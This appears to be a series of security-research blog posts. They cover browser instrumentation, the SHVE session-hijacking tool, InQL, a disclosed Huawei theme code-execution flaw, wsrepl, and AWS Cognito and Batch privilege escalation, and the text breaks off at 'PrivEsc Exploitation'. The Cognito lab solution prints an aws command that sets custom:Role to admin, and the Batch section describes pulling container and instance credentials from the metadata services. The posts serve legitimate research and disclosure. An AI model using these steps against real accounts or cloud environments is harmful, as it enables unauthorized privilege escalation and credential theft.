I have a better solution and it’s built into Firefox and Chrome. Take your instrumentation code, surround it with parenthesis, add && false to the end. The above code becomes this:

(url_params = new Proxy(url_params, {
    __testit: function(a) {
        const loc = 'my_secret_space';
        const urls = JSON.parse(localStorage[loc]||"{}");
        const href = location.protocol + '//' + location.host + location.pathname;
        const s = new Set(urls[href]);
        if (!s.has(a)) {
            urls[href] = Array.from(s.add(a));
            localStorage.setItem(loc, JSON.stringify(urls));
        }
    },
    get: function(a,b,c) {
        this.__testit(b);
        return Reflect.get(...arguments);
    }
}) && false

Now right click the line number where you want to add your code, click “conditional breakpoint”.

Paste your code in there. Due to the && false the condition will never be true, so you won’t ever get a breakpoint. The browser will still execute our code and in the scope of function where we inserted the breakpoint. There are no race conditions and the breakpoint will continue to live. It will show up in new tabs when you open the developer tools. You can quickly disable individual instrumentation scripts by just disabling the assisted breakpoint. Or disable all of them by disabling breakpoints or closing the developer tools window.

I used this particular example to show just how far you can go. The instrumented code will save URL parameters, per site, to a local storage entry. At any given page you can auto-populate all known URL parameters into the URL bar by pasting the following code in to the console.

(() => {
const url = location.protocol + '//' + location.host + location.pathname;
const params = JSON.parse(localStorage.getItem("my_secret_space"))[url];
location.href = url + '?' + params.flatMap( x => `${x}=${x}`).join('&');
})()

If you use this often, you can even put the code in a bookmarklet.

Combining Native and Non-Native Instrumentation

Nothing says we can’t use native and non-native functions at the same time. You can use a content script to implement big fancy codebases. Export that functionality to the global scope and then use it in a conditional breakpoint.

This brings us to the latest feature of Eval Villain. Your conditional can make use of Eval Villains recursive decoding feature. In the pop-up menu click “configure” and go to the “globals” section. Ensure the “sourcer” line is enabled and click save.

I find myself enabling/disabling this feature often, so there is a second “enable” flag in the popup menu itself. It’s in the “enable/disable” menu as “User Sources”. This causes Eval Villain to export the evSourcer function to the global name scope. This will add any arbitrary object to the list of recursively decoded sources.

As can be seen, the first argument is what you name the source. The second is the actual object you want to search sinks. Unless there is a custom encoding that Eval Villain does not understand you can just put this in raw. There is an optional third argument that will cause the sourcer to console.debug every time it’s invoked. This function returns false, so you can use it as a conditional breakpoint anywhere. For example, you can add this as a conditional breakpoint that only runs in the post message handler of interest, when receiving messages from a particular origin as a means of finding if any part of a message will hit a DOM XSS sink. Using this in the right place can alleviate SOP restrictions placed on your instrumentation code.

Just like the evSourcer there is an evSinker. I rarely use this, so there is no “enable/disable” entry for this in the popup menu. It accepts a sink name and a list of arguments and just acts like your own sink. It also returns false so it can easily be used in conditional breakpoints.

Conclusion

Writing your own instrumentation is a powerful skill for vulnerability research. Sometimes, it only takes a couple of lines of JavaScript to tame a giant gully codebase. By knowing how this works, you can have better insight into what tools like Eval Villain and DOM invader can and can’t do. Whenever necessary, you can also adapt your own code when a tool comes up short.

Introducing Session Hijacking Visual Exploitation (SHVE): An Innovative Open-Source Tool for XSS Exploitation

2023-08-31T00:00:00+02:00

Greetings, folks! Today, we’re thrilled to introduce you to our latest tool: Session Hijacking Visual Exploitation, or SHVE. This open-source tool, now available on our GitHub, offers a novel way to hijack a victim’s browser sessions, utilizing them as a visual proxy after hooking via an XSS or a malicious webpage. While some exploitation frameworks, such as BeEF, do provide hooking features, they don’t allow remote visual interactions.

SHVE’s interaction with a victim’s browser in the security context of the user relies on a comprehensive design incorporating multiple elements. These components, each fulfilling a specific function, form a complex, interconnected system that allows a precise and controlled session hijacking. Let’s take a closer look at each of them:

VictimServer: This component serves the malicious JavaScript. Furthermore, it establishes a WebSocket connection to the hooked browsers, facilitating the transmission of commands from the server to the victim’s browser.
AttackerServer: This is the connection point for the attacker client. It supplies all the necessary information to the attacker, such as the details of the different hooked sessions.
Proxy: When the client enters Visual or Interactive mode, it connects to this proxy. The proxy, in turn, uses functionalities provided by the VictimServer to conduct all requests through the hooked browser.

The tool comes with two distinctive modes - Visual and Interactive - for versatile usage.

Visual Mode: The tool provides a real-time view of the victim’s activities. This is particularly useful when exploiting an XSS, as it allows the attacker to witness the victim’s interactions that otherwise might be impossible to observe. For instance, if a victim accesses a real-time chat that isn’t stored for later review, the attacker could see this live interaction.
Interactive Mode: This mode provides a visual gateway to any specified web application. Since the operations are carried out using the victim’s security context via the hooked browser, detection from the server-side becomes significantly more challenging. Unlike typical XSS or CORS misconfigurations exploitation, there’s no need to steal information like Cookies or Local Storage. Instead, the tool uses XHR requests, ensuring CSRF tokens are automatically sent, as both victim and attacker view the same HTML.

Getting Started

We’ve tried to make the installation process as straightforward as possible. You’ll need to have Node.js and npm installed on your system. After cloning our repository, navigate to the server and client directories to install their respective dependencies. Start the server and client, follow the initial setup steps, and you’re ready to go! For the full installation guide, please refer to the README file.

We’ve recorded a video showcasing these modes and demonstrating how to exploit XSS and CORS misconfigurations using one of the Portswigger’s Web Security Academy labs. Here is how SHVE works:

Your browser does not support the video tag.

We look forward to your contributions and insights, and can’t wait to see how you’ll use SHVE in your red team engagements. Happy hacking!

Thanks to Michele Orru and Giuseppe Trotta for their early-stage feedback and ideas.

InQL v5: A Technical Deep Dive

2023-08-17T00:00:00+02:00

We’re thrilled to pull back the curtain on the latest iteration of our widely-used Burp Suite extension - InQL. Version 5 introduces significant enhancements and upgrades, solidifying its place as an indispensable tool for penetration testers and bug bounty hunters.

Introduction
The Journey So Far: From Jython to Kotlin
- The Challenges of Converting a Burp Extension Into Kotlin
- Sidestepping the need for stickytape
Introducing GQLSpection: The Core of InQL v5.x
New Features
The Future of InQL and GraphQL Security
InQL: A Great Project for Students and Contributors
Conclusion

Introduction

The cybersecurity landscape is in a state of constant flux. As GraphQL adoption surges, the demand for an adaptable, resilient testing tool has become paramount. As leaders in GraphQL security, Doyensec is proud to reveal the most recent iteration of our open-source testing tool - InQL v5.x. This isn’t merely an update; it’s a comprehensive revamp designed to augment your GraphQL testing abilities.

The Journey So Far: From Jython to Kotlin

Our journey with InQL started on the Jython platform. However, as time went by, we began to experience the limitations of Jython - chiefly, its lack of support for Python 3, which made it increasingly difficult to find compatible tooling and libraries. It was clear a transition was needed. After careful consideration, we chose Kotlin. Not only is it compatible with Java (which Burp is written in), but it also offers robustness, flexibility, and a thriving developer community.

The Challenges of Converting a Burp Extension Into Kotlin

We opted to include the entire Jython runtime (over 40 MB) within the Kotlin extension to overcome the challenges of reusing the existing Jython code. Although it wasn’t the ideal solution, this approach allowed us to launch the extension as Kotlin, initiate the Jython interpreter, and delegate execution to the older Jython code.

class BurpExtender: IBurpExtender, IExtensionStateListener, BurpExtension {

    private var legacyApi: IBurpExtenderCallbacks? = null
    private var montoya: MontoyaApi? = null

    private var jython: PythonInterpreter? = null
    private var pythonPlugin: PyObject? = null

    // Legacy API gets instantiated first
    override fun registerExtenderCallbacks(callbacks: IBurpExtenderCallbacks) {

        // Save legacy API for the functionality that still relies on it
        legacyApi = callbacks

        // Start embedded Python interpreter session (Jython)
        jython = PythonInterpreter()
    }

    // Montoya API gets instantiated second
    override fun initialize(montoyaApi: MontoyaApi) {
        // The new Montoya API should be used for all of the new functionality in InQL
        montoya = montoyaApi

        // Set the name of the extension
        montoya!!.extension().setName("InQL")

        // Instantiate the legacy Python plugin
        pythonPlugin = legacyPythonPlugin()

        // Pass execution to legacy Python code
        pythonPlugin!!.invoke("registerExtenderCallbacks")
    }

    private fun legacyPythonPlugin(): PyObject {
        // Make sure UTF-8 is used by default
        jython!!.exec("import sys; reload(sys); sys.setdefaultencoding('UTF8')")

        // Pass callbacks received from Burp to Python plugin as a global variable
        jython!!.set("callbacks", legacyApi)
        jython!!.set("montoya", montoya)

        // Instantiate legacy Python plugin
        jython!!.exec("from inql.extender import BurpExtenderPython")
        val legacyPlugin: PyObject = jython!!.eval("BurpExtenderPython(callbacks, montoya)")

        // Delete global after it has been consumed
        jython!!.exec("del callbacks, montoya")

        return legacyPlugin
    }

Sidestepping the need for stickytape

Our switch to Kotlin also solved another problem. Jython extensions in Burp Suite are typically a single .py file, but the complexity of InQL necessitates a multi-file layout. Previously, we used the stickytape library to compress the Python code into a single file. However, stickytape introduced subtle bugs and inhibited access to static files. By making InQL a Kotlin extension, we can now bundle all files into a JAR and access them correctly.

Introducing GQLSpection: The Core of InQL v5.x

A significant milestone in our transition journey involved refactoring the core portion of InQL that handles GraphQL schema parsing. The result is GQLSpection - a standalone library compatible with Python 2/3 and Jython, featuring a convenient CLI interface. We’ve included all GraphQL code examples from the GraphQL specification in our test cases, ensuring comprehensive coverage.

As an added advantage, it also replaces the standalone and CLI modes of the previous InQL version, which were removed to streamline our code base.

New Features

Our clients rely heavily on cutting-edge technologies. As such, we frequently have the opportunity to engage with real-world GraphQL deployments in many of our projects. This rich exposure has allowed us to understand the challenges InQL users face and the requirements they have, enabling us to decide which features to implement. In response to these insights, we’ve introduced several significant features in InQL v5.0 to support more effective and efficient audits and investigations.

Points of Interest

One standout feature in this version is ‘Points of Interest’. Powered by GQLSpection and with the initial implementation contributed by @schoobydrew, this is essentially a keyword scan equipped with several customizable presets.

The Points of Interest scan proves exceptionally useful when analyzing extensive schemas with over 50 queries/mutations and thousands of fields. It produces reports in both human-readable text and JSON format, providing a high-level overview of the vast schemas often found in modern apps, and aiding pentesters in swiftly identifying sensitive data or dangerous functionality within the schema.

Improved Logging

One of my frustrations with earlier versions of the tool was the lack of useful error messages when the parser broke on real-world schemas. So, I introduced configurable logging. This, coupled with the fact that parsing functionality is now handled by GQLSpection, has made InQL v5.0 much more reliable and user-friendly.

In-line Annotations

Another important addition to InQL are the annotations. Prior to this, InQL only generated the bare minimum query, necessitating the use of other tools to deduce the correct input format, expected values, etc. However, with the addition of inline comments populated with content from ‘description’ fields from the GraphQL schema or type annotations, InQL v5.0 has become much more of a standalone tool.

There is a trade-off here: while the extensive annotations make InQL more usable, they can sometimes make it hard to comprehend and navigate. We’re looking at solutions for future releases to dynamically limit the display of annotations.

The Future of InQL and GraphQL Security

Our roadmap for InQL is ambitious. Having said that, we are committed to reintroduce features like GraphiQL and Circular Relationship Detection, achieving full feature parity with v4.

As GraphQL continues to grow, ensuring robust security is crucial. InQL’s future involves addressing niche GraphQL features that are often overlooked and improving upon existing pentesting tools. We look forward to sharing more developments with the community.

InQL: A Great Project for Students and Contributors

InQL is not just a tool, it’s a project – a project that invites the contributions of those who are passionate about cybersecurity. We’re actively seeking students and developers who would like to contribute to InQL or do GraphQL-adjacent security research. This is an opportunity to work with experts in GraphQL security, and play a part in shaping the future of InQL.

Conclusion

InQL v5.x is the result of relentless work and an unwavering commitment to enhancing GraphQL security. We urge all pentesters, bug hunters, and cybersecurity enthusiasts working with GraphQL to try out this new release. If you’ve tried InQL in the past and are looking forward to enhancements, v5.0 will not disappoint.

At Doyensec, we’re not just developing a tool, we’re pushing the boundaries of what’s possible in GraphQL security. We invite you to join us on this journey, whether as a user, contributor, or intern.

Happy Hacking!

Huawei Theme Manager Arbitrary Code Execution

2023-07-26T00:00:00+02:00

Back in 2019, we were lucky enough to take part in the newly-launched Huawei mobile bug bounty. For that, we decided to research Huawei’s Themes.

The Themes Manager allows custom themes on EMUI devices to stylize preferences, and the customization of lock screens, wallpapers and icons. Processes capable of making these types of system-wide changes need to have elevated privileges, making them valuable targets for research as well as exploitation.

Background

When it comes to implementing a lockscreen on EMUI, there were three possible engines used:

com.ibimuyu.lockscreen
com.vlife.huawei.emuilock
com.huawei.ucdlockscreen

When installing a theme, the SystemUI.apk verifies the signature of the application attempting to make these changes against a hardcoded list of trusted ones. From what we observed, this process seems to have been implemented properly, with no clear way to bypass the signature checks.

That said, we discovered that when com.huawei.ucdlockscreen was used, it loaded additional classes at runtime. The signatures of these classes were not validated properly, nor were they even checked. This presented an opportunity for us to introduce our own code.

Taking a look at the structure of the theme archive files (.hwt), we see that the unlock screen elements are packaged as follows:

Looking in the unlock directory, we saw the theme.xml file, which is a manifest specifying several properties. These settings included the dynamic unlock engine to use (ucdscreenlock in our case) and an ext.properties file, which allows for dynamic Java code loading from within the theme file.

Let’s look at the file content:

This instructs the dynamic engine (com.huawei.ucdlockscreen) to load com.huawei.nova.ExtensionJarImpl at runtime from the NOVA6LockScreen2019120501.apk. Since this class is not validated, we can introduce our own code to achieve arbitrary code execution. What makes this even more interesting is that our code will run within a process of a highly privileged application (com.huawei.android.thememanager), as shown below.

Utilizing the logcat utility, we can see the dynamic loading process:

This vulnerability was confirmed via direct testing on EMUI 9.1 and 10, but appears to impact the current version of EMUI with some limitations*.

Impact

As previously mentioned, this results in arbitrary code execution using the PID of a highly privileged application. In our testing, exploitation resulted in obtaining around 200 Android and Huawei custom permissions. Among those were the permissions listed below which could result in total compromise of the device’s user data, sensitive system data, any credentials entered into the system and the integrity of the system’s environment.

Considering that the application can send intents requiring the huawei.android.permission.HW_SIGNATURE_OR_SYSTEM permission, we believe it is possible to leverage existing system functionalities to obtain system level code execution. Once achieved, this vulnerability has great potential as part of a rooting chain.

Exploitability

This issue can be reliably exploited with no technical impediments. That said, exploitation requires installing a custom theme. To accomplish this remotely, user interaction is required. We can conceive of several plausible social engineering scenarios which could be effective or perhaps use a second vulnerability to force the download and installation of themes. Firstly, it is possible to gift themes to other users, so a compromised trusted contact could be leveraged (or spoofed) to convince a victim to accept and install the malicious theme. As an example, the following URL will open the theme gift page: hwt://www.huawei.com/themes?type=33&id=0&from=AAAA&channelId=BBB

Secondly, an attacker could publish a link or QR code pointing to the malicious theme online, then convince a victim into triggering the HwThemeManager application via a deep link using the hwt:// scheme.

To be fair, we must acknowledge that Huawei has a review process in place for new themes and wallpapers, which might limit the use of live themes exploiting this vulnerability.

Partial fix

Huawei released an update for HwThemeManager on February 24, 2022 (internally tracked as HWPSIRT-2019-12158) stating this was resolved. Despite this, we believe the issue was actually resolved in ucdlockscreen.apk (com.huawei.ucdlockscreen version 3 and later).

This is an important distinction, because the latest version of the ucdlockscreen.apk is installed at runtime by HwThemeManager, after applying a theme that requires such an engine. Even on a stock phone (both EMUI 9,10 and latest 12.0.0.149), an attacker with physical access can uninstall the latest version and install the old vulnerable version since it is properly signed by Huawei.

Without further mitigations from Huawei, an attacker with physical access to the device can still leverage this vulnerability to gain system privileged access on even the latest devices.

Further discovery

After a few hours of reverse engineering the fix introduced in the latest version of com.huawei.ucdlockscreen (version 4.6), we discovered an additional bypass impacting the EMUI 9.1 release. This issue doesn’t require physical access and can again trigger the same exploitable condition.

During theme loading, the latest version of com.huawei.ucdlockscreen checks for the presence of a /data/themes/0/unlock/ucdscreenlock/error file. Since all of the files within /data/themes/0/ are copied from the provided theme (.hwt) file they can all be attacker-controlled.

This file is used to check the specific version of the theme. An attacker can simply embed an error file referencing an older version, forcing legacy theme support. When doing so, an attacker would also specify a fictitious package name in the ext.properties file. This combination of changes in the malicious .hwt file bypasses all the required checks - making the issue exploitable again on the latest EMUI9.1, with no physical access required. At the time of our investigation, the other EMUI major versions appear to implement signature validation mechanisms to mitigate this.

Disclosure

This issue was disclosed on Dec 31, 2019 according to the terms of the Huawei Mobile Bug Bounty, and it was addressed by Huawei as described above. Additional research results were reported to Huawei on Sep 1, 2021. Given the time that has elapsed from the original fix and the fact that we believe the issue is no longer remotely exploitable, we have decided to release the details of the vulnerability.

At the time of writing this post (April 28th, 2023), the issue is still exploitable locally on the latest EMUI (12.0.0.149) by force-loading the vulnerable ucdlockscreen.apk. We have decided not to release the vulnerable version of ucdlockscreen.apk as well as the malicious theme proof-of-concept. While the issue is no longer interesting to attackers, it can still benefit the rooting community and facilitate the work of security researchers in identifying issues within Huawei’s EMUI-based devices.

Conclusions

While the vulnerability is technically interesting by itself, there are two security engineering learning lessons here. The biggest takeaway is clearly that while relying on signature validation for authenticating software components can be an effective security measure, it must be thoroughly extended to include any dynamically loaded code. That said, it appears Huawei no longer provides bootloader unlock options (see here) making rooting more complicated and expensive. It remains to be seen if this bug is ever used as part of a chain developed by the rooting community.

A secondary engineering lesson is to ensure that when we design backwards compatibility mechanisms, we should assume that there may be older versions that we want to abandon.

This research was made possible by the Huawei Mobile Phone Bug Bounty Program. We want to thank the Huawei PSIRT for their help in handling this issue, the generous bounty and the openness to disclose the details.

Streamlining Websocket Pentesting with wsrepl

2023-07-18T00:00:00+02:00

In an era defined by instant gratification, where life zips by quicker than a teenager’s TikTok scroll, WebSockets have evolved into the heartbeat of web applications. They’re the unsung heroes in data streaming and bilateral communication, serving up everything in real-time, because apparently, waiting is so last century.

However, when tasked with pentesting these WebSockets, it feels like you’re juggling flaming torches on a unicycle, atop a tightrope! Existing tools, while proficient in their specific realms, are much like mismatched puzzle pieces – they don’t quite fit together, leaving you to bridge the gaps. Consequently, you find yourself shifting from one tool to another, trying to manage them simultaneously and wishing for a more streamlined approach.

That’s where https://github.com/doyensec/wsrepl comes to the rescue. This tool, the latest addition to Doyensec’s security tools, is designed to simplify auditing of websocket-based apps. wsrepl strikes a much needed balance by offering an interactive REPL interface that’s user-friendly, while also being conveniently easy to automate. With wsrepl, we aim to turn the tide in websocket pentesting, providing a tool that is as efficient as it is intuitive.

The Doyensec Challenge

Once upon a time, we took up an engagement with a client whose web application relied heavily on WebSockets for soft real-time communication. This wasn’t an easy feat. The client had a robust bug bounty policy and had undergone multiple pentests before. Hence, we were fully aware that the lowest hanging fruits were probably plucked. Nevertheless, as true Doyensec warriors (‘doyen’ - a term Merriam-Webster describes as ‘a person considered to be knowledgeable or uniquely skilled as a result of long experience in some field of endeavor’), we were prepared to dig deeper for potential vulnerabilities.

Our primary obstacle was the application’s custom protocol for data streaming. Conventional wisdom among pentesters suggests that the most challenging targets are often the ones most overlooked. Intriguing, isn’t it?

The Quest for the Perfect Tool

The immediate go-to tool for pentesting WebSockets would typically be Burp Suite. While it’s a heavyweight in web pentesting, we found its implementation of WebSockets mirrored HTTP requests a little bit too closely, which didn’t sit well with near-realtime communications.

Sure, it does provide a neat way to get an interactive WS session, but it’s a bit tedious - navigating through ‘Upgrade: websocket’, hopping between ‘Repeater’, ‘Websocket’, ‘New WebSocket’, filling in details, and altering HTTP/2 to HTTP/1.1. The result is a decent REPL but the process? Not so much.

Don’t get me wrong, Burp does have its advantages. Pentesters already have it open most times, it highlights JSON or XML, and integrates well with existing extensions. Despite that, it falls short when you have to automate custom authentication schemes, protocols, connection tracking, or data serialization schemes.

Other tools, like websocketking.com and hoppscotch.io/realtime/websocket, offer easy-to-use and aesthetically pleasing graphical clients within the browser. However, they lack comprehensive options for automation. Tools like websocket-harness and WSSiP bridge the gap between HTTP and WebSockets, which can be useful, but again, they don’t offer an interactive REPL for manual inspection of traffic.

Finally, we landed on websocat, a netcat inspired command line WebSockets client that comes closest to what we had in mind. While it does offer a host of features, it’s predominantly geared towards debugging WebSocket servers, not pentesting.

`wsrepl`: The WebSockets Pentesting Hero

Enter wsrepl, born out of necessity as our answer to the challenges we faced. It is not just another pentesting tool, but an agile solution that sits comfortably in the middle - offering an interactive REPL experience while also providing simple and convenient path to automation.

Built with Python’s fantastic TUI framework Textual, it enables an accessible experience that is easy to navigate both by mouse and keyboard. That’s just scratching the surface though. Its interoperability with curl’s arguments enables a fluid transition from the Upgrade request in Burp to wsrepl. All it takes is to copy a request through ‘Copy as curl command’ menu option and replace curl with wsrepl.

On the surface, wsrepl is just like any other tool, showing incoming and outgoing traffic with the added option of sending new messages. The real magic however, is in the details. It leaves nothing to guesswork. Every hexadecimal opcode is shown as per RFC 6455, a feature that could potentially save you from many unnecessary debugging hours.

A lesson learned

Here’s an anecdote to illustrate this point. At the beginning of our engagement with WebSockets, I wasn’t thoroughly familiar with the WebSocket RFC and built my understanding based on what Burp showed me. However, Burp was only displaying text messages, obscuring message opcodes and autonomously handling pings without revealing them in the UI. This partial visibility led to some misconceptions about how WebSockets operate. The developers of the service we were testing seemingly had the same misunderstanding, as they implemented ping traffic using 0x1 - text type messages. This caused confusion and wasted time when my scripts kept losing the connection, even though the traffic appeared to align with my Burp observations.

To avoid similar pitfalls, wsrepl is designed to give you the whole picture, without any hidden corners. Here’s a quick rundown of WebSocket opcodes defined in RFC6544 that you can expect to see in wsrepl:

Opcode	Description
0x0	Continuation Frame
0x1	Text Frame
0x2	Binary Frame
0x8	Connection Close
0x9	Ping
0xA	Pong (must carry the same payload as the corresponding Ping frame)

Contrary to most WebSocket protocols that mainly use 0x1 type messages, wsrepl accompanies all messages with their opcodes, ensuring full transparency. We’ve intentionally made the decision not to conceal ping traffic by default, although you have the choice to hide them using the --hide-ping-pong option.

Additionally, wsrepl introduces the unique capability of sending ‘fake’ ping messages, that use the 0x1 message frame. Payloads can be defined with options --ping-0x1-payload and --pong-0x1-payload, and the interval controlled by --ping-0x1-interval. It also supports client-induced ping messages (protocol level, 0x9), even though typically this is done by the server: --ping-interval.

It’s also noteworth that wsrepl incorporates an automatic reconnection feature in case of disconnects. Coupled with granular ping control, these features empower you to initiate long-lasting and stable WebSocket connections, which have proven useful for executing certain attacks.

Automation Made Simple with `wsrepl`

Moreover, wsrepl is crafted with a primary goal in mind: enabling you to quickly transition into WebSocket automation. To do this, you just need to write a Python plugin, which is pretty straightforward and, unlike Burp, feels quintessentially pythonic.

from wsrepl import Plugin

MESSAGES = [
    "hello",
    "world"
]

class Demo(Plugin):
    """Demo plugin that sends a static list of messages to the server."""
    def init(self):
        self.messages = MESSAGES

It’s Python, so really, the sky’s the limit. For instance, here is how to send a HTTP request to acquire the auth token, and then use it to authenticate with the WebSocket server:

from wsrepl import Plugin
from wsrepl.WSMessage import WSMessage

import json
import requests

class Demo(Plugin):
    """Demo plugin that dynamically acquires authentication token."""
    def init(self):
        # Here we simulate an API request to get a session token by supplying a username and password.
        # For the demo, we're using a dummy endpoint "https://hb.cran.dev/uuid" that returns a UUID.
        # In a real-life scenario, replace this with your own authentication endpoint and provide necessary credentials.
        token = requests.get("https://hb.cran.dev/uuid").json()["uuid"]

        # The acquired session token is then used to populate self.messages with an authentication message.
        # The exact format of this message will depend on your WebSocket server requirements.
        self.messages = [
            json.dumps({
                "auth": "session",
                "sessionId": token
            })
        ]

The plugin system is designed to be as flexible as possible. You can define hooks that are executed at various stages of the WebSocket lifecycle. For instance, you can use on_message_sent to modify messages before they are sent to the server, or on_message_received to parse and extract meaningful data from the server’s responses. The full list of hooks is as follows:

Customizing the REPL UI

The true triumph of wsrepl lies in its capacity to automate even the most complicated protocols. It is easy to add custom serialization routines, allowing you to focus on the stuff that matters.

Say you’re dealing with a protocol that uses JSON for data serialization, and you’re only interested in a single field within that data structure. wsrepl allows you to hide all the boilerplate, yet preserve the option to retrieve the raw data when necessary.

from wsrepl import Plugin

import json
from wsrepl.WSMessage import WSMessage

class Demo(Plugin):
    async def on_message_sent(self, message: WSMessage) -> None:
        # Grab the original message entered by the user
        original = message.msg

        # Prepare a more complex message structure that our server requires.
        message.msg = json.dumps({
            "type": "message",
            "data": {
                "text": original
            }
        })

        # Short and long versions of the message are used for display purposes in REPL UI.
        # By default they are the same as 'message.msg', but here we modify them for better UX.
        message.short = original
        message.long = message.msg


    async def on_message_received(self, message: WSMessage) -> None:
        # Get the original message received from the server
        original = message.msg

        try:
            # Try to parse the received message and extract meaningful data.
            # The exact structure here will depend on your websocket server's responses.
            message.short = json.loads(original)["data"]["text"]
        except:
            # In case of a parsing error, let's inform the user about it in the history view.
            message.short = "Error: could not parse message"

        # Show the original message when the user focuses on it in the UI.
        message.long = original

In conclusion, wsrepl is designed to make your WebSocket pentesting life easier. It’s the perfect blend of an interactive REPL experience with the ease of automation. It may not be the magical solution to every challenge you’ll face in pentesting WebSockets, but it is a powerful tool in your arsenal. Give it a try and let us know your experiences!

Messing Around With AWS Batch For Privilege Escalations

2023-06-13T00:00:00+02:00

From The Previous Episode… Have you solved the CloudSecTidbit Ep. 2 IaC lab?

Solution

The challenge for the AWS Cognito CloudSecTidbit is basically escalating the privileges to admin and reading the internal users list.

The application uses AWS Cognito to issue a session token saved as a cookie with the name aws-cognito-app-access-token.

The JWT is a valid AWS Cognito user token, usable to interact with the service. It is possible to retrieve the current user attributes with the command:

aws cognito-idp get-user --region us-east-1 --access-token <USER_ACCESS_TOKEN>
{
    "Username": "francesco",
    "UserAttributes": [
        {
            "Name": "sub",
            "Value": "5139e6e7-7a37-4e6e-9304-8c32973e4ac0"
        },
        {
            "Name": "email_verified",
            "Value": "true"
        },
        {
            "Name": "name",
            "Value": "francesco"
        },
        {
            "Name": "custom:Role",
            "Value": "user"
        },
        {
            "Name": "email",
            "Value": "dummy@doyensec.com"
        }
    ]
}

Then, because of the default READ/WRITE permissions on the user attributes, the attacker is able to tamper with the custom:Role attribute and set it to admin:

aws --region us-east-1 cognito-idp update-user-attributes --user-attributes "Name=custom:Role,Value=admin" --access-token <USER_ACCESS_TOKEN>

After that, by refreshing the authenticated tab, the user is now recognized as an admin.

That happens because the vulnerable platform trusts the custom:Role attribute to evaluate the authorization level of the user.

Tidbit No. 3 - Messing around with AWS Batch For Privilege Escalations

Q: What is AWS Batch?

A set of batch management capabilities that enable developers, scientists, and engineers to easily and efficiently run hundreds of thousands of batch computing jobs on AWS.
AWS Batch dynamically provisions the optimal quantity and type of compute resources (e.g. CPU or memory optimized compute resources) based on the volume and specific resource requirements of the batch jobs submitted.
With AWS Batch, there is no need to install and manage batch computing software or server clusters, allowing you to instead focus on analyzing results and solving problems
AWS Batch plans, schedules, and executes your batch computing workloads using Amazon EC2 (available with Spot Instances) and AWS compute resources with AWS Fargate or Fargate Spot.

Summarizing the previous points, it is a self-managed and self-scaling scheduler for tasks.

Its main components are:

Jobs. The unit of work, they can be shell scripts, executables, or a container image submitted to AWS Batch.
Job definitions. They are blueprints for the tasks. It is possible to grant them IAM roles to access AWS resources, set their memory and CPU requirements and even control container properties like environment variables or mount points for persistent storage
Job Queues. Submitted jobs are stacked in queues until they are scheduled onto a compute environment. Job queues can be associated with multiple compute environments and configured with different priority values.
Compute environments. Sets of managed or unmanaged compute resources that are usable to run jobs. With managed compute environments, you can choose the desired compute type (Fargate, EC2 and EKS) and deeply configure its resources. AWS Batch launches, manages, and terminates compute types as needed. You can also manage your own compute environments, but you’re responsible for setting up and scaling the instances in an Amazon ECS cluster that AWS Batch creates for you.

The scheme below (taken from the AWS documentation) shows the workflow for the service.

After a first look at AWS Batch basics, we can introduce the core differences in the managed compute environment types.

Orchestration Types In Managed Compute Environments

Fargate

AWS Batch jobs can run on AWS Fargate resources. AWS Fargate uses Amazon ECS to run containers and orchestrates their lifecycle.

This configuration fits cases where it is not needed to have control over the host machine running the container task. All the logic is embedded in the task and there is no need to add context from the host machine.

EC2

AWS Batch jobs can run on Amazon EC2 instances. It allows particular instance configurations like:

Settings for vCPUs, memory and/or GPU
Custom Amazon Machine Image (AMI) with launch templates
Custom environment parameters

This configuration fits scenarios where it is necessary to customize and control the containers’ host environment. As example, you may need to mount an Elastic File System (EFS) and share some folders with the running jobs.

EKS

AWS Batch doesn’t create, administer, or perform lifecycle operations of the EKS clusters. AWS Batch orchestration scales up and down nodes managed by AWS Batch and runs pods on those nodes.

The logic conditions are similar to the ECS case.

Running Tasks With Two Metadata Services & Two Roles - The Unwanted Role Exposition Case

While testing a multi-tenant platform, we managed to leverage AWS Batch to compromise the cloud environment and perform privilege escalation.

The single tenants were using AWS Batch to execute some computational work given a certain input to be processed (tenant data).

The task jobs of all tenants were initialized and executed using the EC2 orchestration type, hence, all batch containers were running the same task-runner EC2 instances.

The scheme below describes the observed scenario at a high-level.

The tenant data (input) was mounted on the EC2 spot instance prior to the execution with Elastic File System (EFS). As can be seen in the design scheme, the specific tenant input data was shared to batch job containers via precise shared folders.

This might seem as a secure and well-isolated environment, but it wasn’t.

In order to illustrate the final exploitation, a few IAM concepts about the vulnerable context must be explained:

Within the described design, the compute environment EC2 spot instances needed a specific role with highly privileged permissions to manage multiple services, including EFS to mount customers’ data
The task containers (batch jobs) had an execution role with the batch:RegisterJobDefinition and batch:SubmitJob permissions.

The Testing Phase

So, during testing we have obviously tried to execute code on the jobs to get access to some internal AWS credentials. Since the Instance Metadata Service (IMDS v2) was network restricted in the running containers, it was not possible to have an easy win by reaching 169.254.169.254 (IMDS IP).

Nevertheless, containers running in ECS and EKS have the Container Metadata Service (CMDS) running and reachable at 169.254.170.2 (did you know?). It is literally the doppelganger of the IMDS service, but for containers and pods in AWS.

Thanks to it, we were able to gather information about the running task. By looking at the AWS documentation, you can learn more about the many environment variables exposed to the running container. Among them, there is AWS_CONTAINER_CREDENTIALS_RELATIVE_URI.

In fact, the CMDS protects users against SSRF interactions by setting a dynamic credential endpoint saved as an environmental variable. By doing so, basic SSRFs cannot find out the pseudo-random part in it and retrieve credentials.

The screenshot below shows an interaction with the CMDS to get the credentials from a running container (our execution context).

At this point, we had the credentials for the ecs-role owned by the running jobs.

Among the ECS-related execution permissions, it had RegisterJobDefinition, SubmitJob and DescribeJobQueues for the AWS Batch service.

Since the basic threat model assumed that users had command execution on the running containers, a certain level of control over the job definitions was not an issue.

Hence, having the RegisterJobDefinition and SubmitJob permissions exposed in the user-controlled context was not considered a vulnerability in the first place.

So, the next question was pretty obvious:

The Turning Point

After many hours of dorking and code review, we managed to discover two additional details:

In the AWS Batch with EC2 compute environment, the jobs’ containers run with host network configuration. This means that Batch job containers use the host EC2 Spot instance’s networking directly

The platform was restricting the IMDS connectivity on job containers when the worker was starting the tasks

Due to these conditions, a batch job could call the IMDSv2 service on behalf of the host EC2 Spot instance if it started without the restrictions applied by the worker, potentially leading to a privilege escalation:

An attacker with the leaked batch job credentials could use RegisterJobDefinition and SubmitJob to define and execute a malicious AWS Batch job.
The malicious job is able to dialogue with the IMDS service on behalf of the host EC2 Spot instance since the network restrictions to the IMDS were not applied.
In this way, it was possible to obtain credentials for the IAM Role owned by the EC2 Spot instances.

The compute environment EC2 spot instances needed a specific role with highly privileged permissions to manage multiple services, including EFS to mount customers’ data etc.

PrivEsc Exploitation

